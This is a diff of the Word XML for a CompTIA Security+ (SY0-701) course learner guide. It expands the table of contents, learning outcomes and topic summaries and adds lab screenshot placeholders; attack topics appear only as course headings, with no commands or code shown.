+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 33 — Active Reconnaissance with Nmap</w:t>
+        <w:tab/>
+        <w:t>64</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 34 — Penetration Testing with Metasploit (Authorised Lab)</w:t>
+        <w:tab/>
+        <w:t>66</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 35 — Compliance Audit with OpenSCAP</w:t>
+        <w:tab/>
+        <w:t>68</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+        <w:ind w:left="432"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Lab 36 — Security Awareness: Run a Phishing Simulation with GoPhish</w:t>
+        <w:tab/>
+        <w:t>69</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Exam Preparation</w:t>
+        <w:tab/>
+        <w:t>70</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:pos="9072" w:val="right" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Glossary</w:t>
+        <w:tab/>
+        <w:t>71</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -384,12 +1483,12 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>This Learner Guide accompanies the WSQ course CompTIA Security+ Certification (SY0-701) (TGS-2023039181), conducted by Tertiary Infotech Academy Pte Ltd. It provides step-by-step instructions for all 36 hands-on labs, organised by the five official CompTIA Security+ SY0-701 exam domains. Every lab maps to a published exam objective and runs in the free Killercoda Ubuntu Playground — a disposable Linux VM in your browser.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Use this guide alongside the course slides and the full lab files in the labs/ folder of the course repository (https://github.com/tertiarycourses/TGS-2023039181-SecurityPlus). Each lab notes the free tools it uses and how to verify success; reset the Killercoda playground between labs that change firewall, PAM or routing state.</w:t>
+        <w:t>This Learner Guide accompanies the WSQ course CompTIA Security+ Certification (SY0-701) (TGS-2023039181), conducted by Tertiary Infotech Academy Pte Ltd. It provides step-by-step instructions for all 43 hands-on labs, organised by the five official CompTIA Security+ SY0-701 exam domains. Every lab maps to a published exam objective and runs in the free Killercoda Ubuntu Playground — a disposable Linux VM in your browser.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Use this guide alongside the course slides and the full lab files in the labs/ folder of the course repository (https://github.com/tertiarycourses/TGS-2023039181-CompTIA-Certified-SecurityPlus-Training). Each lab notes the free tools it uses and how to verify success; reset the Killercoda playground between labs that change firewall, PAM or routing state.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -405,7 +1504,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>LO1: Apply general security concepts — control categories and types, the CIA triad and AAA, cryptographic primitives (hashing, symmetric/asymmetric encryption) and PKI.</w:t>
+        <w:t>LO1: Apply general security concepts — control categories and types, the CIA triad and AAA, Zero Trust, change management, cryptographic primitives (hashing, symmetric/asymmetric encryption) and PKI.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -413,7 +1512,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>LO2: Identify threats, vulnerabilities and mitigations — phishing, password and web attacks (SQLi, XSS), malware, denial-of-service, vulnerability scanning and host hardening.</w:t>
+        <w:t>LO2: Identify threats, vulnerabilities and mitigations — threat actors, social engineering, password and web attacks (SQLi, XSS), malware, denial-of-service, wireless attacks and hardening.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -421,7 +1520,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>LO3: Implement secure architecture — network segmentation, firewalls, WAF, VPN, data-at-rest encryption, TLS hardening and resilient backup.</w:t>
+        <w:t>LO3: Implement secure architecture — cloud and enterprise models, network segmentation, firewalls, WAF, VPN, container security, data-at-rest encryption, TLS hardening and resilient backup/RAID.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -429,7 +1528,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>LO4: Run security operations — SSH/identity hardening, MFA, SIEM, IDS, EDR, file-integrity monitoring, vulnerability management, incident response and automation.</w:t>
+        <w:t>LO4: Run security operations — SSH/identity hardening, MFA, SIEM, IDS, EDR, file-integrity monitoring, packet analysis, vulnerability management, incident response, forensics and automation.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -437,7 +1536,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>LO5: Manage the security program — risk registers and CVSS, reconnaissance, penetration testing, compliance auditing and security-awareness testing.</w:t>
+        <w:t>LO5: Manage the security program — governance, risk registers and CVSS, third-party risk, reconnaissance, penetration testing, compliance auditing and security-awareness testing.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -487,7 +1586,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>The course lab files — clone or download the repository at https://github.com/tertiarycourses/TGS-2023039181-SecurityPlus.</w:t>
+        <w:t>The course lab files — clone or download the repository at https://github.com/tertiarycourses/TGS-2023039181-CompTIA-Certified-SecurityPlus-Training.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -592,7 +1691,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Security controls · CIA &amp; AAA · Hashing · Encryption · PKI</w:t>
+        <w:t>Security controls · CIA &amp; AAA · Zero Trust · Change management · Cryptography · PKI</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -618,7 +1717,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>The CIA triad — confidentiality, integrity, availability — is the goal; AAA (authentication, authorization, accounting) is how identities are governed.</w:t>
+        <w:t>The CIA triad — confidentiality, integrity, availability — is the goal; AAA (authentication, authorization, accounting) is how identities are governed; Zero Trust removes implicit trust.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -812,6 +1911,58 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="2" name="Picture 2"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-01.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 1 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -1060,6 +2211,58 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="3" name="Picture 3"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-02.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 2 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -1278,6 +2481,58 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="4" name="Picture 4"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-03.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 3 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -1496,6 +2751,58 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="5" name="Picture 5"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-04.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 4 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -1714,6 +3021,58 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="6" name="Picture 6"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-05.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 5 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -1739,7 +3098,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Phishing · Passwords · Malware · Web attacks · Scanning · Hardening</w:t>
+        <w:t>Threat actors · Social engineering · Malware · Web &amp; password attacks · Wireless · Mitigations</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1757,6 +3116,14 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
+        <w:t>Threat actors range from script kiddies to organised crime and nation-states — motivation and capability drive the defence you need.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
         <w:t>Social engineering and phishing exploit people; SPF, DKIM and DMARC authenticate mail and expose spoofing.</w:t>
       </w:r>
     </w:p>
@@ -1765,7 +3132,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>Password attacks (spraying, brute force, offline cracking) are countered by length, hashing with salt, and lockout.</w:t>
+        <w:t>Password, wireless and web application attacks (SQL injection, XSS) exploit weak secrets and unvalidated input; malware analysis reveals indicators of compromise.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1773,15 +3140,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>Web application flaws — SQL injection and cross-site scripting (XSS) — come from unvalidated input; mitigate with parameterisation and output encoding.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Find weaknesses before attackers do: vulnerability scanning, malware analysis and a hardening baseline reduce the attack surface.</w:t>
+        <w:t>Mitigation is layered: vulnerability scanning, patching, hardening baselines, segmentation and monitoring shrink the attack surface.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1971,6 +3330,58 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="7" name="Picture 7"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-06.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 6 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -2191,6 +3602,58 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="8" name="Picture 8"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-07.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 7 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -2391,6 +3854,58 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="9" name="Picture 9"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-08.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId17"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 8 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -2611,6 +4126,58 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="10" name="Picture 10"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-09.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId18"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 9 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -2811,6 +4378,58 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="11" name="Picture 11"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-10.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId19"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 10 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -3011,6 +4630,58 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="12" name="Picture 12"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-11.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 11 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -3193,6 +4864,58 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="13" name="Picture 13"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
